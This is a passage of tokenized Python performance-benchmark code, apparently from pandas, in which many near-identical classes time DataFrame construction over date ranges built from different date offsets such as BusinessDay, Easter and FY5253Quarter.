ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_BQuarterEndx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( BQuarterEnd ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_BQuarterEndx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_BYearBeginx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( BYearBegin ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . 
columns ] ) <EOL> def time_frame_ctor_dtindex_BYearBeginx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_BYearBeginx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( BYearBegin ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_BYearBeginx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_BYearEndx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . 
get_index_for_offset ( BYearEnd ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_BYearEndx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_BYearEndx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( BYearEnd ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_BYearEndx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . 
start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_BusinessDayx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( BusinessDay ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_BusinessDayx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_BusinessDayx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( BusinessDay ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_BusinessDayx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . 
ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_BusinessHourx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( BusinessHour ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_BusinessHourx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_BusinessHourx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( BusinessHour ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . 
columns ] ) <EOL> def time_frame_ctor_dtindex_BusinessHourx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_CBMonthBeginx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( CBMonthBegin ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_CBMonthBeginx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_CBMonthBeginx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . 
get_index_for_offset ( CBMonthBegin ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_CBMonthBeginx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_CBMonthEndx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( CBMonthEnd ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_CBMonthEndx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . 
start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_CBMonthEndx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( CBMonthEnd ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_CBMonthEndx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_CDayx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( CDay ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_CDayx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . 
ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_CDayx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( CDay ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_CDayx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_CustomBusinessDayx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( CustomBusinessDay ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . 
columns ] ) <EOL> def time_frame_ctor_dtindex_CustomBusinessDayx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_CustomBusinessDayx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( CustomBusinessDay ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_CustomBusinessDayx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . 
start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_DateOffsetx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( DateOffset ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_DateOffsetx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_DateOffsetx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( DateOffset ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_DateOffsetx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . 
ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_Dayx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( Day ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_Dayx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_Dayx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( Day ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_Dayx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . 
ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_Easterx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( Easter ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_Easterx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_Easterx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( Easter ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . 
d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_Easterx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_FY5253Quarterx1__variation_last ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( FY5253Quarter ( <NUM_LIT:1> , ** { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : '<STR_LIT>' , } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_FY5253Quarterx1__variation_last ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . 
get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_FY5253Quarterx1__variation_nearest ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( FY5253Quarter ( <NUM_LIT:1> , ** { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : '<STR_LIT>' , } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_FY5253Quarterx1__variation_nearest ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . 